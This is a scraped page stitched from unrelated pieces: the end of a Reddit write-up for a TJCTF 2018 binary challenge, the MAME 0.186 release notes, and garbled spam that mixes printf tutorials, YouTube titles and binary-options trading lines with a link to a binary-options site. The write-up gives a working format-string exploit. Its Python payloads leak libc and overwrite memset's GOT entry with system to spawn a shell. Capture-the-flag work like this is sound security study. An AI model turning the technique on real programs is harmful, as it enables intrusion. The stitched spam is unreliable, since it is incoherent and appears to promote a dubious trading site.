Crafting the payload is a little bit tricky, we are now on 64-bit and addresses has a lot of zero bytes, so we can’t add them at the beginning of our message because that would end the printf. We could add them at the end, but in my case I chosen to add them in the password buffer and use them from there.
After leaking the right offsets, we can craft the following vector that will leak libc and will overwrite [email protected].
# addresses memset_GOT = 0x602050 secure_service_ADDR = 0x400DA0 # payload that leaks libc and rewrite memset() GOT to secure_service() # write zeros at the first 4 bytes and the address in the last 4 # also, we will store the addresses where we write in the password buffer off = 22 # offset of password buffer leak_off = 65 # offset of __libc_start_main_ret on the stack payload = "%{}$n%{}${}p%{}$n".format(off + 1, leak_off, secure_service_ADDR, off) ... leaked_libc = stack_leak_address - 0x21b97 # calculate the base 
The next step is to get the shell. We see that memset() is called with our message as the first argument, so if we replace it with system() and add at the beginning of our message “sh || ”, then we will get a shell and the errors from the rest of the string will be ignored. So, let’s write the payload:
# payload that rewrites memset() GOT to system() write1 = (0xffff00000000 & system_ADDR) / 0x100000000 write2 = (0x0000ffff0000 & system_ADDR) / 0x10000 write3 = (0x00000000ffff & system_ADDR) # sort the writes in ascending order writes = [ (write1, p64(memset_GOT + 4)), (write2, p64(memset_GOT + 2)), (write3, p64(memset_GOT + 0)) ] writes.sort(key=lambda tup: tup[0]) print (writes) addresses = ''.join(x[1] for x in writes) write3 = writes[0][0] write2 = writes[1][0] write1 = writes[2][0] code = "sh || " payload = code + "%{}x%{}$hn%{}x%{}$hn%{}x%{}$hn".format(write3 - len(code), off, write2 - write3, off + 1, write1 - write2, off + 2) 
Running the full script will have great results:
Running the exploit
Flag: tjctf{4r3_f0rm47_57r1n65_63771n6_0ld_y37?}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/super_secure.py
And here we are, at the end of the journey. We pwned them all! TJCTF was a great experience with pretty interesting tasks that were beginner oriented, so I recommend it to any newcomer as the organizers did a really great job to assure a high quality CTF.
Don’t forget to subscribe and follow my Github for more wargames solutions and guides. Thanks for reading!
submitted by l1ttl3wh0 to securityCTF [link] [comments]

MAME 0.186 has been released!

MAME 0.186

It’s been one of those long, five-week development cycles, but it’s finally time for your monthly MAME fix. There’s been a lot of touched in this release, with improvements in a number of areas. But before we get to the improvements, we have an embarrassing admission to make: the game added in 0.185 as Acchi Muite Hoi is actually Pata Pata Panic, and the sound ROM mapping was incorrect, making the game unplayable. That’s all sorted out now though, thanks to occasional contributor k2.
New working arcade games include Epos Revenger ’84, Jockey Club II, Hashire Patrol Car, the Mega Play version of Gunstar Heroes, and the much-awaited Taito Classic Space Cyclone. Improvements to emulation make Legionnaire and Heated Barrel fully playable at long last, and Megatouch XL 6000 is working in this release. There are also plenty of new versions of supported games, including a world release of the puzzle game Star Sweep, the Taito licensed version of Bagman, the Japanese release of Top Landing, the Italian release of Penky, and European bootlegs of Amidar and Phoenix. We’ve got some exciting improvements to supported arcade games this month, too. Sound effects for Universal’s Cheeky Mouse are now supported, and the analog section of the melody synthesiser used in Zaccaria’s Jack Rabbit and Money Money has been implemented, although it’s still missing the cassa (bass drum) sound at the moment. We need schematics and quality PCB photos to add support for analog sound synthesis in more games, so if you find any we’d really appreciate if you could send them our way.
New working home/handheld games include Jungle Soft Zone 60, Gradius, Lone ranger, Teenage Mutant Ninja Turtles, Top Gun, and the Game & Watch titles Mario’s Cement Factory, Boxing, Donkey Kong II and Mickey & Donald. The CoCo Games master cartridge is supported as a CoCo slot device, support for the French Minitel 2 terminal has been added (thanks to Jean-François Del Nero), and there’s some more progress on the InterPro systems from Patrick Mackinlay. Peripherals for the TI-99 home computer family have been overhauled, making the PEB a slot device that plugs into the I/O port – this will require changes to your configuration if you use this family of computers.
Finally, the -listroms verb supports device sets (e.g. mpu401 or m68705p3), -listroms, -verifyroms and -listxml support multiple patterns on the command line, -verifyroms is much faster when a small number of sets are specified, and the romcmp tool has seen several improvements.
Get the source/Windows binaries from the download page and enjoy all the improvements. Thanks for continuing to use and support the one and only MAME.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to MAME [link] [comments]

Delmenews - YouTube C Programming Tutorial  Integer Format Specifier & Variable in Printf  Chap-2  Part-9 Timcast - YouTube Print Formatted output in Python Strings  Pointers C Technical Interview Questions and Answers  Mr. Ramana Python 4 - Output Formatting How to print %d using printf in C language

Hexadecimal is often just as good (or even better), as it maps every 4 bits into one hex-digit, giving you both a compact and expressive representation of the binary data. – Kerrek SB Jun 16 '11 at 14:01 There are currently 145 responses to “C Tutorial – printf, Format Specifiers, Format Conversions and Formatted Output” Why not let us know what you think by adding your own comment! loganaayahee on November 21st, 2012: Armando problem solution. printf(“%8.lf\n”, arr[0]); printf(“%9.3lf\n”, arr[1]); printf(“%12.1lf\n”,arr[2]); Thank you for your problem. jasleen on November ... Is there a printf converter to print in binary format? The printf() family is only able to print in base 8, 10, and 16 using the standard specifiers directly. I suggest creating a function that converts the number to a string per code's particular needs. For integer specifiers (d, i, o, u, x, X) − precision specifies the minimum number of digits to be written. If the value to be written is shorter than this number, the result is padded with leading zeros. The value is not truncated even if the result is longer. A precision of 0 means that no character is written for the value 0. For e, E and f specifiers − this is the number of digits to ... Printf format specifiers binary options August 30, 2018 If format includes format specifiers (subsequences beginning with %), the additional arguments following format are formatted and inserted in the resulting string replacing their respective specifiers. Parameters format C string that contains the text to be written to stdout. It can optionally contain embedded format specifiers that are replaced by the values specified in subsequent additional ... In fact, here’s a great format you can use in the printf() function’s formatting text: %w.pf. The w sets the maximum width of the entire number, including the decimal place. The p sets precision. For example: printf("%9.2f",12.45); This statement outputs four spaces and then 12.45. Those four spaces plus 12.45 (five characters total) equal the 9 in the width. Only two values are shown to ... $ printf "%s\n" "hello printf" "in" "bash script" hello printf in bash script Format specifiers. As you could seen in the previous simple examples we have used %s as a format specifier. The most commonly used printf specifiers are %s, %b, %d, %x and %f . The specifiers are replaced by a corresponding arguments. See the following example: Summary: This page is a printf formatting cheat sheet. I originally created this cheat sheet for my own purposes, and then thought I would share it here. A great thing about the printf formatting syntax is that the format specifiers you can use are very similar — if not identical — between different languages, including C, C++, Java, Perl, PHP, Ruby, Scala, and others. Printf Format Specifiers Binary Options October 07, 2017 Get link; Facebook; Twitter; Pinterest; Email; Other Apps

[index] [7695] [22903] [18260] [8899] [28391] [27235] [1035] [5454] [5429] [27748]

Delmenews - YouTube

How to Trade Options on Robinhood for Beginners in 2020 ... Print Formatting Part 1: printf() Conversion Type Characters (Java) - Duration: 8:34. Nathan Schutz 65,042 views. 8:34 . Python Tutorial ... How to Trade Options on Robinhood for Beginners in 2020 ... Learn Printf() function, Number Conversions and Format Specifiers in C C MCQs and Answers - Duration: 3:34. Naresh i Technologies 978 ... This lesson discusses about Input and Output in C ( printf, scanf, getchar, putchar, format specifier) This channel is an ultimate guide to prepare for job interviews for software engineers ... In this video we will see how to generate PDF file in PowerApps. How to print a form in PowerApps. Check out my articles and blogs on Power Platform here htt... This video will the first introduction for the format specifiers, as we shall expand the concept in this chapter and understand how to print values from vari... Print Formatting Part 1: printf() Conversion Type Characters (Java) - Duration: 8:34. Nathan Schutz 62,450 views. 8:34. Program to check whether a number is Prime or not in C - Duration: 18:47 ... Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube. Tim Pool opinions and commentary channel https://www.minds.com/Timcast Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42. BLW Online Trading Recommended for you Delmenews.de ist das lokale Nachrichtenportal für die Stadt Delmenhorst bei Bremen. Jeden Tag gibt es aktuelle Meldungen aus der kreisfreien Stadt. Der Delme...

http://binary-optiontrade.calkimulty.tk